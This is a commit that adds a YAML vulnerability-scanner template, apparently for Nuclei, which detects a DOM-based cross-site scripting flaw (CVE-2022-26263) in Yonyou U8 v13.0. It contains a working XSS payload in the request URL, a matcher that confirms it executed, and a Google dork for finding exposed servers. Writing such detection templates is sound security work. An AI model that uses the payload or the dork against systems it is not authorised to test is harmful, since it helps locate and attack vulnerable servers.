Merge pull request #5577 from edoardottt/CVE-2022-26263

Add CVE-2022-26263
2022-11-11 19:21:29 +05:30 · 2022-11-11 19:21:29 +05:30 · 9bf3e1fe7e
parent 721c475eed 6ec541a815
commit 9bf3e1fe7e
1 changed files with 31 additions and 0 deletions
--- a/cves/2022/CVE-2022-26263.yaml
+++ b/cves/2022/CVE-2022-26263.yaml
@ -0,0 +1,31 @@
+id: CVE-2022-26263
+
+info:
+  name: Yonyou u8 v13.0 - Cross Site Scripting
+  author: edoardottt,theamanrawat
+  severity: medium
+  description: |
+    Yonyou u8 v13.0 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability via the component /u8sl/WebHelp.
+  reference:
+    - https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26263
+  classification:
+    cve-id: CVE-2022-26263
+  metadata:
+    verified: true
+    google-dork: inurl:/u8sl/WebHelp
+  tags: cve,cve2022,yonyou,xss
+
+headless:
+  - steps:
+      - args:
+          url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27"><xsstag>()locxss")#javascript:console.log(document.domain)'
+        action: navigate
+      - action: waitload
+
+    matchers:
+      - type: word
+        words:
+          - '<frame src="javascript:console.log(document.domain)"'
+          - 'webhelp4.js'
+        condition: and